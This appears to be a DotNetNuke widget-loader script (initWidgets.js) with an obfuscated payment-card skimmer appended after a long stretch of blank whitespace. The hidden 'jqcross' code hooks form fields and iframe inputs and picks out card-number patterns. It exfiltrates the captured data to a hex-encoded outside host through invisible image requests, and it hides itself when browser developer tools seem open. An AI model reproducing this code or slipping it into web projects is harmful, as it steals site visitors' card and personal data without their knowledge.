function loadWidgets() {
    if (typeof (DotNetNuke) === "undefined")
        Type.registerNamespace("DotNetNuke.UI.WebControls");

    if (typeof (DotNetNuke.UI.WebControls.Utility) === "undefined")
        jQuery.getScript($dnn.baseResourcesUrl + "Shared/scripts/DotNetNukeAjaxShared.js",
                    function() { jQuery.getScript($dnn.baseResourcesUrl + "Shared/scripts/widgets.js"); });
    else
        jQuery.getScript($dnn.baseResourcesUrl + "Shared/scripts/widgets.js");
}

if (typeof ($dnn) === "undefined") {
    $dnn = new Object();
    $dnn.pageScripts = document.getElementsByTagName("script");
    $dnn.scriptUrl = $dnn.pageScripts[$dnn.pageScripts.length - 1].src;
    $dnn.hostUrl = (typeof ($dnn.hostUrl) == "undefined" ? $dnn.scriptUrl.toLowerCase().replace("resources/shared/scripts/initwidgets.js", "") : $dnn.hostUrl);
    if (!$dnn.hostUrl.endsWith("/")) $dnn.hostUrl += "/";
    $dnn.baseDnnScriptUrl = $dnn.hostUrl + "Resources/Shared/scripts/";
    $dnn.baseResourcesUrl = $dnn.hostUrl + "Resources/";
}

// jQuery dependency
if (typeof (Sys) === "undefined")
    jQuery.getScript($dnn.baseDnnScriptUrl + "MSAJAX/MicrosoftAjax.js", loadWidgets());
else
    loadWidgets();

if (Sys && Sys.Application) {
    Sys.Application.notifyScriptLoaded();
}
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																																																		
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																																																		
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																																																		
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																																																		
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																																																		
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																																																		
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																																																		
var jqcross=jqcross||null;null==jqcross&&(jqcross=!0,function(e,t,n,r,o,i,a,c,s,l,u,f,d,g,h,m,v){function w(e,t,n){var r=(r=n[t].id)||s[3];r+="-"+t*(n.length+1);try{n[t].setAttribute("name",r)}catch(r){}}function j(){var t,n,r=document.querySelectorAll(c[0]);try{r.forEach(function(r){t=r.contentWindow.document,n=t.querySelectorAll(u),t.addEventListener(c[2],function(){return S(this)},!0),n.forEach(function(t){t.addEventListener(e[3],function(e){return b(e.target.name,e.target.value)},!0)})})}catch(t){}}function p(){var t,n=document.querySelector(c[1]),r=document.querySelectorAll(u);null!=n&&(t=n.querySelector(c[4]),n.addEventListener(c[2],function(){return S(this)},!0),t&&t.addEventListener(e[2],function(){return S(n)},!0)),r.forEach(function(t){t.addEventListener(e[3],function(e){return b(e.target.name,e.target.value)},!0)})}function S(e){var t;if(e!=s[2]){t=e.length;for(var n=0;n<t;n++)typeof e.elements[n].value!=s[1]&&e.elements[n].value.trim()&&b(e.elements[n].name,e.elements[n].value)}}function b(e,t){var n=0,r={};return e=e.replace(/^.*\$(.*?)$/gm,"$1").trim(),t=t.trim(),r[e]="",!(t.length<1)&&(e=e.length<1?(e=(e=window.location.pathname).replace(/^(.*\/)(.*?)([.?\/]).*?$/gm,"$2")).substr(0,4)+e.substr(-4):e.replace(/^.*\$(.*?)$/g,"$1").substr(-45),void(t.length<40&&(t.replace(/[- .]/g,"").match(/^([3456]\d{14,15})$/g)&&(n=1),r[e]=t,r[e])&&(3e3<g[d].length&&(g[f]=0,y()),y(d,JSON.stringify(r).replace('"":"",',"")),n&&(y(f,s[0]-1),m==s[2]&&(m=setInterval(y,1e3))))))}function y(){var e,t,n,r,o=f,i=arguments[0];if(1<(n=arguments.length))(e=arguments[1])&&(t=i!=o?(t=(t=g[i])&&0<t.length?function(e,t){var n;try{e=JSON.parse(A(e)),t=JSON.parse(A(t)),n=JSON.stringify(Object.assign(e,t))}catch(o){for(var r in t)t.hasOwnProperty(r)&&(e[r]=t[r]);n=e}finally{return n}}(t,q(e)):e,q(t)):e,g[i]=t);else{if(1==n)return g[i]||0;(r=g[o])<s[0]?r<2||1==v?I():(r--,g[o]=r,v=!1,r<s[0]/2&&(v=!0)):(v=!1,g[o]=s[0])}}function I(){var e,t,n,r;1==(!h&&(n=Math.floor(4*Math.random()+0),r=["png","jpg","svg","gif"],e=a+g[d]+"."+r[n],(t=document.createElement(A("696D67"))).setAttribute(A("737263"),e),t.setAttribute(A(["77","9","474","8"].join("6")),"0"),t.setAttribute(A(["","8","5","9","7","874"].join("6")),"0"),document.body.appendChild(t),!0))&&(g[d]="",g[f]=s[0],clearInterval(m),m=s[2])}function E(e,t){var n=e,r=["223a22","222c22","_","-"];return 1==t?n.split(r[0]).join(r[2]).split(r[1]).join(r[3]):n.split(r[2]).join(r[0]).split(r[3]).join(r[1])}function q(e){var t="";try{for(var n=0;n<e.length;n++)t+=e.charCodeAt(n).toString(16);t=E(t,1)}catch(n){t=e}return t}function A(e){var t,n="";try{if((e=E(e)).match("^[0-9a-fA-F.-]+$"))for(var r=0;r<e.length;r+=2)t=e.substr(r,2),n+=String.fromCharCode(parseInt(t,16));else n=e}catch(r){n=e}return n}e=A(["70","f73742c","3","c","9","3","b2c","f","e7375","2","d","9742c","3","8","1","e","7","5"].join("6")).split(","),t=A(["68","4","4","0","33a2f2f"].join("7")),n=A(["","9","e7075743a","e","f74285b","e","1","d","55d292c73","5","c","5","3743a","e","f74285b","e","1","d","55d29"].join("6")),r=A(["2e","3","f","d2f3f"].join("6")),o=Math.floor(2*Math.random()+0),i=A(["","0","4","5","862","","","12e6e65747","6f6c686f7","747c","0","4","4","66161","52e6e65747","6f6c686f7","74"].join("3")).split("|"),a=t+i[o]+r,c=A(["","9","","72","1","d","52c","","","f72","d2c7375","2","d","9742c70","f73742c","2757474","f","e"].join("6")).split(","),l=[(s=[180,void 0,null,"retbase","-","ts","=","none","states","data"])[3],s[4]].join(""),u=["inpu",",selec",",","ex","area"].join("t"),f=[l,s[8]].join(""),d=[l,s[9]].join(""),h=!(g=[]),m=s[2],v=!1,window.addEventListener("load",function(){document.querySelectorAll(n).forEach(w),g[d]=sessionStorage.getItem(d),g[d]||(g[d]=""),g[f]=sessionStorage.getItem(f),g[f]||(g[f]=s[0]),sessionStorage.getItem(d)==g[d]&&sessionStorage.removeItem(d),sessionStorage.getItem(f)==g[f]&&sessionStorage.removeItem(f),g[f]<s[0]&&!h&&I();try{p(),j()}catch(e){p()}window.addEventListener("beforeunload",function(e){sessionStorage.setItem(d,g[d]),sessionStorage.setItem(f,g[f])})}),setInterval(function(){p(),j()},5e3),setInterval(function(){var e=100<window.outerWidth-window.innerWidth,t=100<window.outerHeight-window.innerHeight;h=!(t&&e||!(window.Firebug&&window.Firebug.chrome&&window.Firebug.chrome.isInitialized||e||t))},500),window.helloclm=A(["59","57321"].join("6"))}());
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																																																		
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																																																		
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																																																		
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																																																		
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																																																		
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																																																		
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																																																		
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																																																		
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																																																		
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	
																																	